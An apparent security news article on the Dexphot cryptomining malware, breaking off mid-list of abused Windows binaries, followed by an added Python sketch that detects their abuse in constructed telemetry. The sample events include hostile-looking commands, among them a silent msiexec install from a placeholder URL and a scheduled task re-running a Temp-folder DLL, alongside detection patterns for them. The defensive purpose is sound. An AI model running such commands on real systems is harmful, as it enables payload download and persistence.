A new malware strain dubbed Dexphot attacks Windows computers to mine cryptocurrency, using monitoring services and scheduled tasks to rerun the infection if Windows Defender removes it. The malware uses fileless techniques to get malicious code executed directly in memory, and it hijacks legitimate processes to hide the malicious activity. Microsoft has closely tracked the threat since 2018; the threat actors continuously improve the malware, targeting new processes and defense mechanisms.

Malicious Behaviour

[Figure: Dexphot Behaviour & Infection Chain]

The malware employs multiple levels of polymorphism across the binaries it distributes, and it uses fileless techniques as protection against behavior-based detection. The malware abuses the following legitimate processes:

msiexec.exe – Microsoft process to install, modify, and perform operations on Windows Installer
unzip.exe – Extraction utility
rundll32.exe – Used to run DLL files
schtasks.exe – To create scheduled ...
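As an added example that is not part of the original article, the Python sketch below shows how a defender might flag abuse of the legitimate binaries the article lists (msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe) in process-creation telemetry, including the scheduled-task persistence the article describes. The pipe-separated log format, the parent-process allow-list, the user-writable directory patterns, the rule thresholds and every event in the sample are constructed assumptions for illustration; none of them are Dexphot indicators taken from the article.

```python
"""Added detection sketch for the living-off-the-land binaries the article lists.
All events below are constructed sample telemetry, not real Dexphot artefacts."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Legitimate binaries the article says the malware abuses. Their mere presence is
# normal on any Windows host, so the rules below key on *how* each one is invoked.
WATCHED = {"msiexec.exe", "unzip.exe", "rundll32.exe", "schtasks.exe"}

# Parents from which these tools are ordinarily started (assumption; tune per estate).
EXPECTED_PARENTS = {"explorer.exe", "services.exe", "svchost.exe", "cmd.exe", "powershell.exe"}

# Directories an unprivileged user can write to (assumed heuristic); DLLs or task
# actions pointing here deserve a closer look.
USER_WRITABLE = re.compile(r"\\(temp|appdata|users\\public|programdata)\\", re.I)


@dataclass
class ProcEvent:
    pid: int
    image: str     # basename of the created process, lower-case
    parent: str    # basename of the parent process, lower-case
    cmdline: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].strip().lower()


def parse_line(line: str) -> ProcEvent:
    """Parse the constructed 'pid|image|parent|cmdline' format used by the samples."""
    pid, image, parent, cmd = line.split("|", 3)
    return ProcEvent(int(pid), basename(image), basename(parent), cmd.strip())


def findings(ev: ProcEvent) -> list[str]:
    """Return human-readable reasons this event looks like LOLBin abuse ([] if clean)."""
    if ev.image not in WATCHED:
        return []
    out: list[str] = []
    cmd = ev.cmdline
    # Persistence: a scheduled task that (re)launches a payload, as the article describes.
    if ev.image == "schtasks.exe" and re.search(r"(^|\s)/create\b", cmd, re.I):
        out.append("scheduled task created")
        if USER_WRITABLE.search(cmd):
            out.append("task action points into user-writable directory")
    # In-memory loading via a DLL that lives outside Program Files / System32.
    if ev.image == "rundll32.exe" and USER_WRITABLE.search(cmd) and re.search(r"\.dll\b", cmd, re.I):
        out.append("rundll32 loading DLL from user-writable directory")
    # Silent installer run straight from a URL: a common first stage for droppers.
    if ev.image == "msiexec.exe" and re.search(r"https?://", cmd, re.I) and re.search(r"(^|\s)/q", cmd, re.I):
        out.append("msiexec quiet install from remote URL")
    # Multi-stage chain: one watched tool spawning another is rare in normal use.
    if ev.parent in WATCHED:
        out.append(f"spawned by another watched binary ({ev.parent})")
    elif ev.parent not in EXPECTED_PARENTS:
        out.append(f"unexpected parent ({ev.parent})")
    return out


def scan(lines) -> dict[int, list[str]]:
    """Map pid -> findings for every event that triggered at least one rule."""
    result: dict[int, list[str]] = {}
    for line in lines:
        ev = parse_line(line)
        hits = findings(ev)
        if hits:
            result[ev.pid] = hits
    return result


# Constructed sample telemetry (pid|image|parent|cmdline); all paths and names are placeholders.
SAMPLE = [
    r"1001|C:\Windows\explorer.exe|C:\Windows\System32\winlogon.exe|explorer.exe",
    r"1002|C:\Windows\System32\msiexec.exe|C:\Windows\explorer.exe|msiexec.exe /i C:\Users\u\Downloads\app.msi",
    r"1003|C:\Windows\System32\msiexec.exe|C:\Users\u\AppData\Local\Temp\stage1.exe|msiexec.exe /q /i http://example.invalid/pkg.msi",
    r"1004|C:\Users\u\AppData\Local\Temp\unzip.exe|C:\Windows\System32\msiexec.exe|unzip.exe -o payload.zip",
    r"1005|C:\Windows\System32\rundll32.exe|C:\Users\u\AppData\Local\Temp\unzip.exe|rundll32.exe C:\Users\u\AppData\Local\Temp\x.dll,Start",
    r'1006|C:\Windows\System32\schtasks.exe|C:\Windows\System32\rundll32.exe|schtasks.exe /create /sc minute /mo 30 /tn Updater /tr "rundll32.exe C:\Users\u\AppData\Local\Temp\x.dll,Start"',
    r"1007|C:\Windows\System32\schtasks.exe|C:\Windows\explorer.exe|schtasks.exe /query /tn Backup",
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE).items():
        print(pid, "; ".join(hits))
```

The rules deliberately ignore benign uses of the same binaries (an interactive msiexec install from Downloads, a schtasks /query) and fire on the combination of a watched binary with a suspicious argument or an unusual parent, which is what a behaviour-based rule needs when the binaries themselves are legitimate.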